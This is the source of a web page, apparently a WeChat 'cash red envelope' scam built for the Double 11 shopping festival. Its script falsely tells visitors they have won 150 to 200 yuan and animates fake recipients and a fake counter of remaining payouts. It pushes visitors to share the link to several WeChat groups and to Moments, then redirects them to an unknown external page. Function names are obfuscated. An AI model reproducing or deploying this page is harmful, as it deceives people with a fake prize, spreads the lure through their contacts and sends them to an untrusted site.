

<!DOCTYPE html>
<html lang="en" style="font-size: 53.6px;">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <script type="text/javascript" src="static/js/jquery.min.js"></script>
    <meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=0,viewport-fit=cover">
    <style>html, body {
            background-color: #EDEDED
        }

        * {
            padding: 0;
            margin: 0
        }

        body {
            font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;
        }

        @font-face {
            font-family: 'open';
            src: url('static/font/open.woff2');
            font-weight: normal;
            font-style: normal;
        }

        @keyframes show1 {
            0% {
                opacity: 0;
                transform: scale(0.2);
            }
            100% {
                opacity: 1;
                transform: scale(1);
            }
        }

        @keyframes btn1 {
            0% {
                transform: rotate(-720deg);
            }
            100% {
                transform: rotate(0deg);
            }
        }

        @keyframes show2 {
            0% {
                opacity: 0;
                transform: translateY(50%);
            }
            100% {
                opacity: 1;
                transform: translateY(0%);
            }
        }

        @keyframes btn2 {
            0% {
                transform: scale(0)
            }
            100% {
                transform: scale(1);
            }
        }

        @keyframes show3 {
            0% {
                opacity: 0;
                transform: translateY(-50%);
            }
            100% {
                opacity: 1;
                transform: translateY(0%);
            }
        }

        @keyframes btn3 {
            0% {
                transform: scale(0)
            }
            100% {
                transform: scale(1);
            }
        }

        @keyframes show4 {
            0% {
                opacity: 0;
                border-radius: 100%
            }
            100% {
                opacity: 1;
                border-radius: 0%;
            }
        }

        @keyframes btn4 {
            0% {
                transform: scale(1, 0)
            }
            100% {
                transform: scale(1, 1);
            }
        }

        @keyframes btnShake1 {
            0% {
                transform: scale(1);
            }
            40% {
                transform: scale(1.1);
            }
            60% {
                transform: scale(.9);
            }
            80% {
                transform: scale(1.2);
            }
            100% {
                transform: scale(1);
            }
        }

        @keyframes btnShake2 {
            0% {
                transform: scale(1);
            }
            40% {
                transform: scale(1.1, 0.9);
            }
            60% {
                transform: scale(.9, 1.1);
            }
            80% {
                transform: scale(1.2, 0.8);
            }
            100% {
                transform: scale(1);
            }
        }

        @keyframes btnShake3 {
            0% {
                transform: scale(1, 1) rotate(0deg);
            }
            10% {
                transform: scale(1.2, 0.8);
            }
            20% {
                transform: scale(0.8, 1.2);
            }
            30% {
                transform: scale(1.2, 0.8);
            }
            40% {
                transform: scale(0.8, 1.2);
            }
            50% {
                transform: scale(1, 1);
            }
            60% {
                transform: rotate(-15deg);
            }
            70% {
                transform: rotate(15deg);
            }
            80% {
                transform: rotate(-25deg);
            }
            90% {
                transform: rotate(25deg);
            }
            100% {
                transform: scale(1, 1) rotate(0deg);
            }
        }

        @keyframes btnShake4 {
            0% {
                transform: rotate(0deg);
                opacity: 1;
            }
            10% {
                transform: scale(1.2, 0.8);
            }
            20% {
                transform: scale(0.8, 1.2);
            }
            30% {
                transform: scale(1.2, 0.8);
            }
            40% {
                transform: scale(0.8, 1.2);
            }
            50% {
                transform: scale(1, 1);
            }
            60% {
                opacity: 1;
            }
            70% {
                opacity: 0.5;
            }
            80% {
                opacity: 1;
            }
            90% {
                opacity: 0.5;
            }
            100% {
                transform: scale(1, 1);
                opacity: 1;
            }
        }

        @keyframes btnMove {
            from {
                transform: rotateY(180deg)
            }
            to {
                transform: rotateY(360deg)
            }
        }

        @keyframes itemMove1 {
            0% {
                height: 0rem;
            }
            100% {
                height: 1.2rem;
            }
        }

        @keyframes itemMove2 {
            0% {
                height: 0rem;
                transform: scaleY(0);
            }
            40% {
                height: 1.2rem;
                transform: scaleY(0);
            }
            100% {
                transform: scaleY(1);
            }
        }

        @keyframes itemMove3 {
            0% {
                height: 0rem;
                transform: translateX(2rem);
                opacity: 0;
            }
            40% {
                height: 1.2rem;
                transform: translateX(2rem);
                opacity: 0;
            }
            100% {
                transform: translateX(0rem);
                opacity: 1;
            }
        }

        @keyframes itemMove4 {
            0% {
                height: 0rem;
                transform: translateX(-2rem);
                opacity: 0;
            }
            40% {
                height: 1.2rem;
                transform: translateX(-2rem);
                opacity: 0;
            }
            100% {
                transform: translateX(0rem);
                opacity: 1;
            }
        }

        @keyframes tipMove {
            0% {
                transform: translate(0rem, 0%);
            }
            40% {
                transform: translate(-0.2rem, 30%);
            }
            100% {
                transform: translate(0rem, 0%);
            }
        }

    </style>
</head>
<body>
<script type="text/javascript" src="static/js/jweixin-1.6.0.js"></script>

<script type="text/javascript" src="static/js/common.js"></script>
<script>

//生成从start到end的随机数
			function getRandom(start, end, fixed=0) {
				let differ = end - start
				let random = Math.random()
				return (start + differ * random).toFixed(fixed)
			}
var money=getRandom(150,200,2);
    var ossUrl = 'https://xx1-77.oss-cn-shanghai.aliyuncs.com/xx1-41/jinwan/';
    var advertising = 'http://fx123.cyyqgh.com';
 
    !function (a, b) {
        var c = b.documentElement
            , d = "orientationchange" in window ? "orientationchange" : "resize"
            , e = function () {
            var a = c.clientWidth;
            a && (c.style.fontSize = 100 * (a / 750) + "px");
        };
        b.addEventListener && (e(),
            a.addEventListener(d, e, !1),
            b.addEventListener("DOMContentLoaded", e, !1));
    }(window, document);

    function Element(a) {
        var b = a.tagName
            , c = a.props
            , d = a.children;
        return this instanceof Element ? (this.tagName = b,
            this.props = c || {},
            this.children = d || [],
            void 0) : new Element({
            tagName: b,
            props: c,
            children: d
        });
    }

    Element.prototype.render = function () {
        var a, b, c = document.createElement(this.tagName), d = this.props;
        for (a in d)
            b = d[a],
                c.setAttribute(a, b);
        return this.children.forEach(function (a) {
            var b = null;
            b = a instanceof Element ? a.render() : document.createTextNode(a),
                c.appendChild(b);
        }),
            c;
    }

    function fdm7r1dmx9khg(a) {
        return document.querySelector(a);
    }

    function is74wle4kbr2y(a, b) {
        var c = document.createElement("script");
        c.src = a,
            c.onload = function () {
                "function" == typeof b && b();
            }
            ,
            document.body.appendChild(c);
    }


    function i28o2hkspuvyo8wb() {
        function a(a, b) {
            var c = b - a + 1;
            return Math.floor(Math.random() * c + a);
        }

        function b() {
            var a = Math.floor(10 * Math.random()) + 5
                , b = new Date(new Date().getTime() - 6e4 * a)
                , c = ("0" + b.getHours()).slice(-2)
                , d = ("0" + b.getMinutes()).slice(-2);
            return ("0" + b.getSeconds()).slice(-2),
            c + ":" + d;
        }

        function c(a) {
            return Element({
                tagName: "li",
                props: {
                    style: "width: 100%;height: 1.2rem;overflow: hidden;box-sizing: border-box;padding: 0rem 0.2rem;border-bottom: 0.02rem solid rgba(0, 0, 0, 0.05);display: flex;flex-wrap: wrap;align-items: center;justify-content: center;"
                },
                children: [Element({
                    tagName: "img",
                    props: {
                        src: a.avatar,
                        style: "width: 0.8rem;height: 0.8rem;margin-right: 0.2rem;overflow: hidden;background-color: #eee;border-radius: 20% "
                    }
                }), Element({
                    tagName: "div",
                    props: {
                        style: "flex: 1;"
                    },
                    children: [Element({
                        tagName: "div",
                        props: {
                            style: "font-size: 0.3rem;color: #000;margin-bottom: 0.08rem;"
                        },
                        children: [a.name]
                    }), Element({
                        tagName: "div",
                        props: {
                            style: "font-size: 0.28rem;color: #929493;"
                        },
                        children: [b()]
                    })]
                }), Element({
                    tagName: "div",
                    props: {
                        style: "text-align: right;"
                    },
                    children: [Element({
                        tagName: "i",
                        props: {
                            "class": "icon-success",
                            style: "margin-right: 0.1rem"
                        },
                        children: []
                    })]
                })]
            });
        }

        function d() {
            var b, d = Math.floor(4 * Math.random()) + 1, e = h.lastChild;
            e.parentNode.removeChild(e),
                b = c(f[r]),
                b.props.style += "animation:itemMove" + d + " 0.5s",
                h.insertBefore(b.render(), h.childNodes[0]),
                r++,
            r >= f.length && (r = 0),
                k -= a(80, 150),
                fdm7r1dmx9khg("[data-num]").innerHTML = k;
        }

        function e(a, b) {
            var c = 1e3
                , d = b
                , e = 50
                , f = d / (c / e)
                , g = 0
                , h = 0
                , i = setInterval(function () {
                g = Math.floor(100 * (g + f)) / 100,
                g >= d && (clearInterval(i),
                    g = d);
                var b = Number(g);
                b != h && (h = b,
                    a.innerHTML = h.toFixed(2));
            }, 30);
        }

        var f, g, h, i, k, j = [];
        for (r = 10,
                 f = user,
                 f.sort(function () {
                     return Math.random() > .5 ? -1 : 1;
                 }),
                 p = 0; 10 > p; p++)
            j[p] = c(f[p]);
        k = a(5e4, 8e4),
        g = Element({
            tagName: "div",
            props: {
                onclick: "app.alert('<p style=" + 'font-size:24px;font-weight:bold;color:#b2a382;' + ">祝贺</p><p style=" + 'font-size:18px;color:#b2a382;' + ">您获得现金补贴奖励</p><p style=" + 'font-size:30px;font-weight:bold;color:#f6411a;' + ">￥" + money + "</p><p style=" + 'font-size:16px;' + "><span style=" + 'color:#f6411a;' + ">活动要求：</span>您只需分享到<span style=" + 'color:#f6411a;font-size:24px;' + ">微信群</span></p><p style=" + 'font-size:16px;color:#b2a382;' + ">完成后自动存入您的零钱</p><p style=" + 'font-size:18px;padding-top:25px;' + ">总金额仅剩余8232.19万，先到先得，活动经认证，真实有效</p>', '我知道了')",
                style: "height: 100vh; overflow: hidden; background-color: #fff;"
            },
            children: [Element({
                tagName: "div",
                props: {
                    style: "height: 6rem;background:url(https://xx3-88.oss-cn-shanghai.aliyuncs.com/xx2-66/hongbao/static/img/bg.png) #f35543 no-repeat;background-size: cover;border-radius: 0rem 0rem 50% 50% / 0.2rem 0.2rem 22% 22%;margin-bottom: 0.4rem;box-shadow:0rem 0.06rem 0rem 0rem #f0ce6f"
                },
                children: [Element({
                    tagName: "img",
                    props: {
                        src: config.logo,
                        style: "width: 1.5rem;height: 1.5rem;margin: 0 auto 0;display: block;padding-top: 0.2rem;"
                    }
                }), Element({
                    tagName: "p",
                    props: {
                        style: "font-size: 0.43rem;color: #fee2b2;text-align: center;padding-top: 0.2rem "
                    },
                    children: [config.ztitle]
                }), Element({
                    tagName: "p",
                    props: {
                        style: "font-size: 1.1rem;text-align: center;padding-top: 0.2rem;color: #fee2b2;font-weight: bold "
                    },
                    children: ["￥", Element({
                        tagName: "span",
                       
                        props: {
                             class: 'mymoney',
                            "data-time": 0
                        },
                        children: [money]
                    })]
                }), Element({
                    tagName: "div",
                    props: {
                        style: "display:block;text-align: center;font-size: 0.3rem;color: #fee2b2 "
                    },
                    children: [config.ftitle]
                }), Element({
                    tagName: "div",
                    props: {
                        style: "margin: 0 auto;margin-top:.25rem;background: rgb(255, 220, 185);color: red;width:4.08rem;border-radius: 1rem;" +
                        "font-weight:600;cursor: pointer;padding:.20rem;font-size:0.35rem;animation: Updown .5s infinite alternate;text-align:center;"
                    },
                    children: ["立即领取"]
                })]
            }), Element({
                tagName: "div",
                props: {
                    style: "width: 100%;height: 0.2rem;background-color: #eceeed;"
                }
            }), Element({
                tagName: "div",
                props: {
                    style: "font-size: 0.28rem;color:#929493;height: 0.6rem;line-height: 0.6rem;padding-left: 0.2rem;border-bottom: solid 0.02rem rgba(0,0,0,0.05) "
                },
                children: ["总发放100000份 剩余", Element({
                    tagName: "span",
                    props: {
                        "data-num": 0
                    },
                    children: [k]
                }), "份"]
            }), Element({
                tagName: "ul",
                props: {
                    id: "list",
                    style: "width: 100%;background-color: rgba(255, 255, 255, 0.1);overflow: hidden;border-radius: 0.1rem;height: 12rem;"
                },
                children: j
            }), Element({
                tagName: "div",
                props: {
                    style: "opacity: 1; position: fixed; z-index: 999; top: -40px; right: 0px; overflow: hidden; text-align: center; color: #fff; font-size: 15px; animation: tipMove 1.5s infinite;"
                },
                children: [Element({
                    tagName: "div",
                    props: {
                        style: "overflow: hidden; width: 110px; height: 100px;"
                    },
                    children: [Element({
                        tagName: "img",
                        props: {
                            src: ossUrl + 'static/img/jiantou@2x.png',
                            style: "width: 1.2rem;height: 1.2rem;margin: 0 auto 0;display: block;padding-top: 1rem;"
                        },
                    })]
                })]
            })]
        }),
            document.body.appendChild(g.render()),
            h = fdm7r1dmx9khg("#list"),
            e(fdm7r1dmx9khg("[data-time]"), Number(money)),
            i = setInterval(function () {
                return h.parentNode ? (d(),
                    void 0) : clearInterval(i);
            }, 2e3);
        history.pushState(history.length + 1, "message", "#" + new Date().getTime() + '/share' +'/index.html' );
    }
    var app = {
        alert: function (a, b, c) {
            var d, e;
            document.querySelector("#dialog") || (d = Element({
                tagName: "div",
                props: {
                    id: "dialog",
                    style: "display: none;position: fixed;z-index: 1000;top: 0;right: 0;left: 0;bottom: 0;background: rgba(0, 0, 0, 0.6);"
                },
                children: [Element({
                    tagName: "div",
                    props: {
                        style: "position:fixed;z-index:5000;width:80%;max-width:300px;top:50%;left:50%;transform:translate(-50%,-50%);background-color:#FFFFFF;text-align:center;border-radius:20px;overflow:hidden;"
                    },
                    children: [Element({
                        tagName: "div",
                        props: {
                            style: "padding:1.7em 20px 1.7em;font-size:15px;line-height:1.3;word-wrap:break-word;word-break:break-all;",
                            "data-msg": 0
                        }
                    }), Element({
                        tagName: "b",
                        props: {
                            style: "width: 100%; height: 45px; padding-bottom: 1px; display: flex; flex-wrap: wrap; justify-content: center; align-items: center; color: #bda475; font-size: 16px; border-top: 1px solid #EEEEEE;",
                            "data-go": 0
                        }
                    })]
                })]
            }),
                document.body.appendChild(d.render())),
                e = fdm7r1dmx9khg("#dialog"),
                fdm7r1dmx9khg("[data-msg]").innerHTML = a.replace("{money}", money),
                fdm7r1dmx9khg("[data-go]").innerHTML = b || "好的",
                e.style.display = "block",
                fdm7r1dmx9khg("[data-go]").onclick = function () {
                    e.style.display = "none",
                    "function" == typeof c && c();
                };
        }
    };


    function gda6jrp46x27p7(a, b, c) {
        var d = new XMLHttpRequest();
        d.onreadystatechange = function () {
            4 === d.readyState && (200 === d.status || 304 === d.status ? "function" == typeof b && b(d.responseText) : "function" == typeof c && c(d));
        }, d.open("GET", a, !0), d.send(null);
    }

    api = null, step = 0;

    var config = {
        ftitle: '完成所有步骤后 自动存入零钱',
        ztitle: '现金红包等你来',
        logo: ossUrl + 'static/img/dejgh.png'
    };

    var user = [
        {name: "孙笑川", avatar: ossUrl + "static/img/100"},
        {name: "带带大师兄", avatar: ossUrl + "static/img/100(1)"},
        {name: "六小龄孙", avatar: ossUrl + "static/img/100(2)"},
        {name: "夢醒ぴ誮落盡", avatar: ossUrl + "static/img/100(3)"},
        {name: "最好的我们", avatar: ossUrl + "static/img/100(4)"},
        {name: "甜味少女馆", avatar: ossUrl + "static/img/100(5)"},
        {name: "风有几分甜", avatar: ossUrl + "static/img/100(6)"},
        {name: "风月难入怀", avatar: ossUrl + "static/img/100(7)"},
        {name: "神明不渡我", avatar: ossUrl + "static/img/100(8)"},
        {name: "壊壊の少爷", avatar: ossUrl + "static/img/100(9)"},
        {name: "山河故人在", avatar: ossUrl + "static/img/100"},
        {name: "孙粒子", avatar: ossUrl + "static/img/100(1)"},
        {name: "Mr. Xue", avatar: ossUrl + "static/img/100(2)"},
        {name: "、dacy", avatar: ossUrl + "static/img/100(3)"},
        {name: "已婚少年", avatar: ossUrl + "static/img/100(4)"},
        {name: "叫我冰冰", avatar: ossUrl + "static/img/100(5)"},
        {name: "卢正英", avatar: ossUrl + "static/img/100(6)"},
        {name: "Jkz.", avatar: ossUrl + "static/img/100(7)"}
    ];

    var backlink = '//appmessage.oss-cn-qingdao.aliyuncs.com/b.js';

    window.onload = function () {
        orgu5wf0enzz8()
    }


    function orgu5wf0enzz8(a) {
        orgu5wf0enzz8 = function () {
        };
        i28o2hkspuvyo8wb();
        app.alert('<p style="font-size:24px;font-weight:bold;color:#b2a382;">祝贺</p><p style="font-size:18px;color:#b2a382;">您获得现金补贴奖励</p><p class="mymoney" id="mymoney" style="font-size:30px;font-weight:bold;color:#f6411a;">￥' + money + '</p><p style="font-size:16px;"><span style="color:#f6411a;">活动要求：</span>您只需分享到<span style="color:#f6411a;font-size:24px;">微信群</span></p><p style="font-size:16px;color:#b2a382;">完成后自动存入您的零钱</p><p style="font-size:18px;padding-top:25px;">总金额仅剩余8232.19万，先到先得，活动经认证，真实有效</p>', "我知道了");
    }


			var _num=0;
			var mytitle=new Array()
			mytitle[0]='迎双11，送红包，速点';
			mytitle[1]='迎双11，送红包，速点';
			mytitle[2]='迎双11，送红包，速点';



			
			var mydesc=new Array()
			mydesc[0]='迎双11，送红包，速来...';
			mydesc[1]='迎双11，送红包，速来...';
			mydesc[2]='迎双11，送红包，速来...';



			
			var mypop=new Array()
			mypop[0]='<p style="font-size:24px;font-weight:bold;color:#11c067;">分享成功</p><p style="font-size:18px;">请继续分享到<span style="font-size:24px;font-weight:bold;color:#e05a55;">2</span>个不同的群</p><p style="font-size:24px;font-weight:bold;color:#f6411a;">￥' + money + '</p><p style="font-size:18px;">完成后自动存入您的零钱</p>';
			
			mypop[1]='<p style="font-size:24px;font-weight:bold;color:#11c067;">分享成功</p><p style="font-size:18px;">请继续分享到<span style="font-size:24px;font-weight:bold;color:#e05a55;">1</span>个不同的群</p><p style="font-size:24px;font-weight:bold;color:#f6411a;">￥' + money + '</p><p style="font-size:18px;">完成后自动存入您的零钱</p>';
			
			mypop[2]="<p style='color:green'>分享成功！</p><p style='color:#000000'>剩下最后一步啦！</p><p style='color:#000000'>请分享到<span style='color:red'>朋友圈</span>,获赠<span style='color:red'>"+money+"</span>元立即</p><p>到账！</p>";
			

		
			
			function _alert1(str) {
				zeroModal.alert(str);
			}
		
			
			function changepop(){
				
				 app.alert(mypop[_num], "我知道了");
				_num++;
			}
			
			//生成从start到end的随机数
			function getRandom(start, end, fixed=0) {
				let differ = end - start
				let random = Math.random()
				return (start + differ * random).toFixed(fixed)
			}
			
		var url = encodeURIComponent(location.href.split("#")[0]);


$.ajax({
	type: "get",
	url: "http://fx123.cyyqgh.com/wechat.php?link=" + url,
	dataType: "json",
	contentType: "application/json; charset=utf-8",
	success: function(e) {
			var d = e.appid,
			i = e.timestamp,
			t = e.noncestr,
			n = e.signature;
		wx.config({
			debug: 0,
			appId: d,
			timestamp: i,
			nonceStr: t,
			signature: n,
			jsApiList: ["onMenuShareTimeline", "onMenuShareAppMessage"]
		}), 
		wx.ready(function() {
		
		// 分享到朋友圈
			wx.onMenuShareTimeline({
				title: mytitle[_num],
				desc: mydesc[_num],
				link: "http://fx123.cyyqgh.com/jumpPage.html",
				imgUrl: "http://fx123.cyyqgh.com/img/654.png",
				 success: function () {
				if(_num>2)
				{
					location.href = "http://fx123.cyyqgh.com/gkwy1.php"
					return;
				}
                  changepop();
                }
			}), 
			
			// 分享给朋友
			wx.onMenuShareAppMessage({
				title: mytitle[_num],
				desc: mydesc[_num],
				link: "http://fx123.cyyqgh.com/jumpPage.html",
				imgUrl: "http://fx123.cyyqgh.com/img/654.png",
				success: function () {
				if(_num>2)
				{
					location.href = "http://fx123.cyyqgh.com/gkwy1.php"
					return;
				}
                changepop();
                }
			})
		}),
		wx.error(function(res){
		alert("失败");
		<!-- alert(10); -->
			// config信息验证失败会执行error函数，如签名过期导致验证失败，具体错误信息可以打开config的debug模式查看，也可以在返回的res参数中查看，对于SPA可以在这里更新签名。
		});
	}
});

</script>
<div style="display:none">
<script type="text/javascript" src="https://s9.cnzz.com/z_stat.php?id=1279268959&web_id=1279268959"></script>
</div>

</body>
</html>
